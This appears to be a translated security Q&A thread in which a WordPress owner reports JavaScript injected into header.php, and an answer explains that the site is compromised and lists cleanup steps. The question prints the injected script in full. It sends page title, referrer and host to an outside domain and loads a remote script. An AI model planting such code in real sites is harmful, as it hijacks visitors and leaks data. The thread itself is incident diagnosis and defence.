Header.php sigue cambiando con el código JavaScript en WordPress [duplicado]

Navega tus respuestas
-1

Observé que mi publicación en el blog lleva demasiado tiempo para cargar y comencé a intentar descubrir los problemas que se ocultan. Encontré que hay un código JavaScript inyectado en header.php aquí: 

<?php
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://kamerownia.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
?>
    
pregunta KamleshNishad 04.12.2015 - 16:19
fuente

1 respuesta

0

Su sitio web está comprometido.

Debería buscar archivos modificados utilizando WordFence (la función de auditoría), leer los registros de acceso y encontrar la vulnerabilidad que utilizaron y cerrar el agujero e instalar alguna solución de seguridad como NinjaFirewall.

enlace
enlace

Sin embargo, lo mejor es:

  1. encuentra la vulnerabilidad
  2. compruebe sus copias de seguridad para una versión limpia de su sitio web / servidor
  3. eliminar el sitio web actual (archivos + base de datos) / servidor
  4. instala una copia de seguridad limpia y corrige las vulnerabilidades
  5. cambie todas las contraseñas (FTP, base de datos, WordPress) y verifique las cuentas de usuario
  6. instale soluciones de seguridad e instale todas las actualizaciones (temas + complementos)
respondido por el Daniel Ruf 04.12.2015 - 16:26
fuente

Lea otras preguntas en las etiquetas

ROP: usar el valor de retorno de la función Almacenar datos sin saber nada sobre el usuario